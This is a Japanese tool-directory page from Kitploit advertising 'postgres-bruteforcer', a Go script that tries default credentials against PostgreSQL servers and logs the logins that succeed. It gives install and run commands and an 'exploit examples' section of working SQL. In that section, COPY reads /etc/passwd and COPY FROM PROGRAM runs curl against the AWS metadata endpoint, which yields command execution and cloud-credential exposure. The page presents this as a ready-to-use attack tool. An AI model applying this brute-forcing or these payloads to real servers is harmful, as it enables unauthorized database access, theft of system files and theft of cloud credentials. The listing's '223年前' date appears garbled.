Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
postgres-bruteforcer — このツールは、デフォルトの認証情報のリストを取得し、PostgreSQLサーバーに対してテストして、動作したものとアクセス可能なデータベースをログに記録します。 | Kitploit
ツール/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
パスワード攻撃エクスプロイトペネトレーションテスト認証データベースセキュリティ
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

このツールは、デフォルトの認証情報のリストを取得し、PostgreSQLサーバーに対してテストして、動作したものとアクセス可能なデータベースをログに記録します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
223年前未レビュー

postgres-bruteforcer

概要

このGoスクリプトは、creds.txt というファイルからユーザー名とパスワードのリストを読み込み、PostgreSQLデータベースに対してそれらを試します。

このスクリプトは、コマンドライン引数としてPostgreSQLサーバーのIPを、またはIPアドレスのテキストファイルを受け取ります。

アクセスが許可された場合、スクリプトはその出力を pg-output.txt というファイルに書き込みます。

ユーザー postgres が利用可能な場合、これは通常スーパーユーザーであり、RCE、LFI、SSRFを可能にすることがあります。

インストール方法

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

実行方法

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

エクスプロイト例

/etc/passwd/ を取得

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - AWSメタデータを取得

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
ツールをダウンロード